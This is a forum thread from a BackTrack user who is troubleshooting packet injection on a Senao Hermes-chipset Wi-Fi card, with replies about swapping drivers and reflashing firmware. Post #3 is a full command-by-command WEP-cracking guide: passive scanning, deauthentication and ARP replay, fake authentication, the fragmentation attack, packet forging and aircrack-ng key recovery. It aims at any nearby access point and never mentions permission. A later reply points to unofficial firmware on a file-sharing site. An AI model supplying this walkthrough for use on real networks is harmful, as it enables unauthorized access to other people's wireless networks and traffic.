Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: NL-2511CD EXT2 injection help

  1. #1
    Junior Member
    Join Date
    Apr 2007
    Posts
    28

    Default NL-2511CD EXT2 injection help

    Hi, i just joined the site today but i have been reading around since yesterday. That may not seem like a lot but i have been reading for 12hours at a time. Um, heres my information:

    IBM Thinkpad T30
    -512 Ram
    -Pentium 4-M 1.8GHz
    -40GB HDD
    -Senao NL-2511CD PLUS EXT2 200mw PCMCIA WiFi 802.11b
    -My Interface is: eth1
    -My Chipset is: Hermes1
    -My Driver is: Orinoco


    I did the following:

    1: Put the card in and load up backtrack 2 final. Once it starts, the
    drivers for the card should be loaded. Open a bash prompt and type:

    rm /lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/net/wireless/orinoco*


    rm /lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/net/wireless/hermes.ko
    nano /etc/modprobe.d/blacklist

    2: Once you open the backlist file, comment out the following lines in
    etc/modprobe.d/blacklist:

    *NOTE: to comment something out, just add a # before it*


    #blacklist hostap_cs
    #blacklist hostap_pci
    #blacklist hostap_plx
    #blacklist hostap

    (Press CTRL-O to save changes)

    3: Now, insert the card again. With some laptops you might need to type:

    pccardctl insert

    in the bash prompt before it will notice the card again. Now type:

    bt ~ # lsmod

    4: Lsmod will "lists modules" that are currently loaded by your card.

    Module Size Used by
    hostap_cs 56500 1
    hostap 107540 1 hostap_cs

    5: Make sure that you see, hostap_cs 56500 1, hostap 107540 1 ,hostap_cs loaded.
    If all goes well then now you can use the Packet Injection methods with
    your wifi card.

    lsmod

    6: Lsmod is used to list the modules(drivers) that are loaded for you
    card, and if it's using hostap or wlan-ng do load the drivers. Make sure
    it's using hostap. Now when you type lsmod you shoud see the following:

    Module Size Used by
    orinoco_cs 13576 1
    orinoco 37280 1 orinoco_cs
    hermes 6272 2 orinoco_cs,orinoco

    after i did this, i am able to use monitor mode (i could before, because kismet would set my card into it) but then i tried to use the "WEP crack with no client" attack. But when it came time to deauth it gave me a error saying, unsuccessful and that packet injection does not work AT ALL on hermes1 and other cards, but yet i see people typing that it works for them... So all i would like to know is:

    1: Is my card capable of preforming a WEP crack on A,B, and G networks?
    2: Is my card capable of preforming packet injection?
    3: Also when i typed lsmod instead of seeing:

    Module Size Used by
    hostap_cs 56500 1
    hostap 107540 1 hostap_cs

    i saw:

    Module Size Used by
    hostap_cs 56500 0
    hostap 107540 1 hostap_cs

    Please, if anyone can help me i would be so greatfull. i am completely stuck. Thank-you



    -ShaTt3r3d Mind

  2. #2
    Junior Member
    Join Date
    Apr 2007
    Posts
    28

    Default

    Can anyone help me? I just can't figure out why this is not working. i mean if its cause of my Hermes1 chipset then someone please tell me, because i will try to get another card, but i just don't understand. If this is the case, then why are other people posting that they have been able to use their hermes1 based cards WITH packet injection. I just want to know if this is true or not, because i just built two computers and linked them up with a new linksys router JUST to see if i can finally learn how to break WEP encryption. Please just tell me if this is true or not, and if it is true, can and how do i enable packet injection. Just point me in the right direction and i well read more and more until i get it. Please. Thank-you

    P.S.
    Just to show you what i have done up to this point. Heres is a FULL list of my current actions
    (Most of this is from different posts that i have read from here and from other forums. Plus the "no wireless client attack" is from a video from offensive-security.com. I just listened to everything he said and took information from him and other posts and tried to make it clear for me to understand. Here it is.

  3. #3
    Junior Member
    Join Date
    Apr 2007
    Posts
    28

    Default

    ************************************************** ****************************************
    *INTRODUCTION
    ************************************************** ****************************************
    Here i present to you what i like to call a 2-Piece Combo (or 2-PC)

    Combo One:
    Mixing passive scanning, Deauth/Replay Attack and aircrack to crack the WEP in under
    15-min's with a client associated with the AP.

    Combo Two:
    The Same as Combo One, except there is no client associated with the AP. You would use two
    NEW attacks called FAKEAUTH and FRAGMENT. FAKEAUTH with other corrections, allows you to
    generate traffic on the network. Then use the new FRAGMENT attackwhich creates a
    "semi key trail" from the AP to your MAC which, with the FAKEAUTH attack allows you to
    hijack the AP and create traffic, even if no one is connected to it. Then using
    Deauth/Replay you can greatly increase the traffic load and crack the key within minutes.
    ************************************************** *****************************************
    *INTRODUCTION
    ************************************************** *****************************************







    ************************************************** *****************************************
    *NOTES
    ************************************************** *****************************************
    1: This was all done using Backtrack 2 Final
    Download from remote-exploit

    2: This will show you the advanced way to crack WEP

    3: Some PRISM2/2.5 chipset will work with
    this method (Hermes1 dosen't)

    4: Using this method(s) (see below) will allow you to
    the AP with or without a client, and under 15-mins

    5: Just to make this clear, this is the "ADVANCED WEP crack method".
    Special attacks/methods will be used, like: Replay/Deauth/Arp injections. :-)
    ************************************************** ******************************************
    *NOTES
    ************************************************** ******************************************






    ************************************************** ******************************************
    COMBO ONE: The Beginning
    ************************************************** ******************************************
    1: Open a bash prompt, and type:

    airodump-ng --band abg <wifi>

    -This will start a passive scan of AP's around your area

    2: Once you see, the AP that you want to crack make sure it has the following
    and write it down:
    -BSSID of the AP
    -The BSSID of a client. If there is none then don't worry about it.
    -The channel number
    -Make sure it has WEP encryption

    3: Type:

    CTRL-C

    to stop airodump-ng.

    Then type:
    airodump-ng -w <Name of save file> -c <channel#> --band abg <wifi>

    This will start a passive scan of the AP's like before, but now it's only scanning on the
    channel the AP is on, and will hopefully speed things up, like collecting useless packets
    of other AP's and channels (Sure you can filter that out later, BUT this cut's a bit of
    time off the capturing process. Watch the "PACKET/DATA" count. : )

    4: (Deauth Attack) Now, open a new bash prompt. And type:

    aireplay-ng -e <SSID> -a <BSSID> -c <Client Mac Address> --deauth 10 <wifi>

    -Dont activate this yet, this will cause a disconnection from the network (for the client)
    and open reconnection it will send a packets containing parts of the WEP key back to the
    router. This is what we want to intercept. So first go to step 5 before activating step 4.

    5: (Replay Attack) Open another bash prompt and type:

    aireplay-ng --arpreplay -b <BSSID> -h <Client Mac Address> <wifi>

    -Activate this. This attack will listen and sniff for the packet from the attack above. Now
    start the Deauth Attack. Once you start it you should see a deauth/discon of the machine,
    then it should capture the ARP packet (Used to reconnect to the AP) it will prompt you with
    "Use This Packet?" Type Y and now aireplay-ng will begin to replay that packet over and over
    to the BSSID. You can now close the Deauth Attack, but leave the Replay Attack open so you
    can keep growing your IV packet count. Leave it alone until you hit the 200,000 mark, then
    go into step 6

    6: Now open one last bash prompt, and type:

    aircrack-ng -f 4 -m <BSSID> -n <WEP Key Strength> <Name of save file>

    NOTE: The file type should be .CAP but if not just type ls to see the file.

    -give it a few, and hopefully in a bit you should see the text "KEY FOUND! in bold red
    letters. Good luck, and keep hacking!
    ************************************************** ******************************************
    COMBO ONE: THE END!
    ************************************************** ******************************************








    ************************************************** ******************************************
    COMBO TWO: THE BEGINNING!
    ************************************************** ******************************************
    1: Open a bash prompt, and type:

    airodump-ng --band abg <wifi>

    -This will start a passive scan of AP's around your area

    2: Once you see, the AP that you want to crack make sure it has the following
    and write it down:
    -BSSID of the AP
    -The BSSID of a client. If there is none then don't worry about it.
    -The channel number
    -Make sure it has WEP encryption

    Now stop airodump-ng type:

    CTRL-C


    3: Now clear the screen and type:

    Airmon-ng start <wifi> <channel#>

    4: Open a new batch prompt and type:

    export AP=<AP Mac Address>

    Then Type:
    export WIFI=<Your Mac Address>

    -This cuts down on the typing and sets the Mac Address to the $AP/$WIFI (Read On)

    Then Type:
    ifconfig <WIFI> up

    Then Type:
    iwconfig <WIFI> mode Monitor channel <channel#>

    5: (DEAUTH ATTACK)
    Clear this window and type:

    aireplay-ng -1 0 -e <SSID> -a $AP -h $WIFI <wifi>

    -You should see the following:

    Sending Authentication Request
    Authentication successful
    Sending Association Request
    Association successful :-)


    6: Open another bash windows and type:

    aireplay-ng -5 -b $AP -h $WIFI <wifi>

    -Aireplay-ng should scan for the ARP and ask you to use this packet, type y
    Look below and COPY the fragment code in "SAVING KEYSTREAM". also make sure that
    the BSSID, and Source MAC should be the SAME and match the AP (BSSID) your hacking.
    Example:

    BSSID = 00:04:E2F:E5:8A
    Dest. MAC = 01:00:5E:7F:FF:FA
    Source MAC = 00:04:E2F:E5:8A

    7: (FRAGMENT ATTACK) Clear this screen and type:

    packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y <THE FRAGMENT CODE>.xor -w arp-request

    -The arp-request file is very important

    8: Now open a new bash prompt and type:

    airodump-ng -c <channel#> -bssid $AP --ivs w cap <wifi>

    -Airodump-ng should now begin to capture packets and save em to the cap.ivs file

    9FAKEAUTH ATTACK) Open up a new bash prompt and type:


    aireplay-ng -2 -r arp-request <wifi>

    -Make sure the BSSID matches the AP you are trying to hack. Make sure the "SM" Mathes your Mac
    Address. The DM is 255.255.255.255.255/FF:FF:FF:FF:FF:FF and make sure the BSSID matches the AP BSSID.
    Example:

    BSSID = 00:04:E2F:E5:8A
    Dest. MAC = FF:FF:FF:FF:FF:FF
    Source MAC = 06:14:A4:27:FB:12

    -If all goes well, it should ask you do you want to use this packet? Click Y
    It will begin to send the packet from your laptop to the AP and airodump-ng should be collection/saving the
    information

    16: Open another bash promt, and type:

    aircrack-ng -n <KEY STRENGTH> -b $AP *.ivs

    It should open the cap-01.ivs from airodump-ng, and should begin to crack it.
    ************************************************** ******************************************
    COMBO TWO: THE END!
    ************************************************** ******************************************

  4. #4
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    where did you find this

  5. #5
    Junior Member
    Join Date
    Apr 2007
    Posts
    28

    Default

    Wow still no help? Ok um after a few hours i found more information. A few people suggested to upgrade the firmware. and then there were some information about patching drivers. ok so i took that information and revised it to something i could under stand


    1: boot into BT2F

    2: Take out the wireless card

    3: Type the following in the bash prompt:
    rmmod orinoco_cs
    rmmod orinoco
    rmmod hermes
    modprobe hostap_cs
    rm /lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/net/wireless/orinoco*
    rm /lib/modules/2.6.20-BT-PwnSauce-NOSMP/kernel/drivers/net/wireless/hermes.ko

    4: Now type this into the bash prompt:
    nano /etc/modprobe.d/blacklist

    Locate the Following:
    blacklist hostap_cs
    blacklist hostap_pci
    blacklist hostap_plx
    blacklist hostap

    Now make it look like this:
    # blacklist hostap_cs
    # blacklist hostap_pci
    # blacklist hostap_plx
    # blacklist hostap

    Now press CTRL-X to exit, it will ask you do you want to write to disk, type Y.
    Then type enter to close

    5: Now type this in the bash window:

    nano /etc/pcmcia/config

    Go down to the #Wireless network adapters and look for:

    card "Intersil PRISM2 11 Mbps Wireless Adapter"
    manfid 0x0156, 0x0002
    bind "orinoco_cs"

    Now change it to:

    card "Intersil PRISM2 11 Mbps Wireless Adapter"
    manfid 0x0156, 0x0002
    bind "hostap_cs"

    Now press CTRL-X to exit, it will ask you od you want to write to disk, type Y.
    Then type enter to close.

    6: Now reinsert the wireless card and type:

    iwconfig

    Now look and see if what is your card extention. It be wlan0 (Altho for me i also has
    wifi0), if you still have eth1 then you did something wrong.

    7: Now type the following:

    airmon-ng start wlan0 <channel#>
    ifconfig wlan0 up

    8: Now Continue with the attacks.



    Ok so after i did this my eth1 turned into a wlan0 BUT my problem now is when i try to use airodump:

    airodummp-ng wlan0

    just to scan for networks nothing comes out now, and before when i typed:

    airodump-ng --band abg wlan0

    a few AP's appeared but VERY slow. Also even after i typed:

    airmon-ng wlan0 mode monitor 6

    then:

    ifconfig wlan0 up

    my wireless card still just blinks even if im trying to do a passive scan with airodump, but before it went solid. Can someone please help me, this is driving me crazy. How can i fix my card so that it will scan faster like before? Also when i tried to deauth my router it just hung after i typed the command. I had to press CTRL-C to stop it.

  6. #6
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    what firmware do you have.

  7. #7
    Junior Member
    Join Date
    Apr 2007
    Posts
    28

    Default

    My firmware: Intersil 1.4.9

    It looks like this:

    eth1: Firmware determined as Intersil 1.4.9

  8. #8
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    i dont think you'l need to patch anything. thats also the same firmware my card had before i flashed it with http://www.4shared.com/file/13786203...senao_174.html
    you can also use linux to flash which can be found in this forum too. everyone tells me dont flash with windows, do it through linux.
    so flash at your own risk

    After you have your firmware sorted, boot BT with your card in, eject it.
    nano /etc/modprobe.d/blacklist
    # blacklist hostap_cs
    blacklist hostap_pci
    blacklist hostap_plx
    blacklist hostap
    blacklist orinoco_pci
    blacklist orinoco_cs
    blacklist orinoco
    blacklist hermes
    Ctrl+X / Y / enter
    you might need to reboot, its only happened to me once.
    it should be all sorted now.
    post back if you come across any problems.

  9. #9
    Junior Member
    Join Date
    Apr 2007
    Posts
    28

    Default

    Hmm ok so i dont need to flash? Well i like that idea cause i dont want to mess up my card. Um ok so you're saying open the blacklist file with nano and only comment out

    # blacklist hostap_cs

    ? or do i comment out

    blacklist hostap_pci
    blacklist hostap_plx
    blacklist hostap
    blacklist orinoco_pci
    blacklist orinoco_cs
    blacklist orinoco
    blacklist hermes

    Also?

    Oh, i am not sure if i said this before but i am using a live cd

    Thank you SOOOOO much : )

  10. #10
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    forget the blacklist if your using a live cd.
    rmmod orinoco_cs
    rmmod orinoco
    rmmod hermes
    modprobe hostap_cs

    i no you do this but if you get any errors then add
    rmmod orinoco_pci
    i had to do that.
    firmware 1.7.4 is the best for injection. that link is for that version.
    if you do use it, add both hex files to the program before you flash. or do it through linux

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •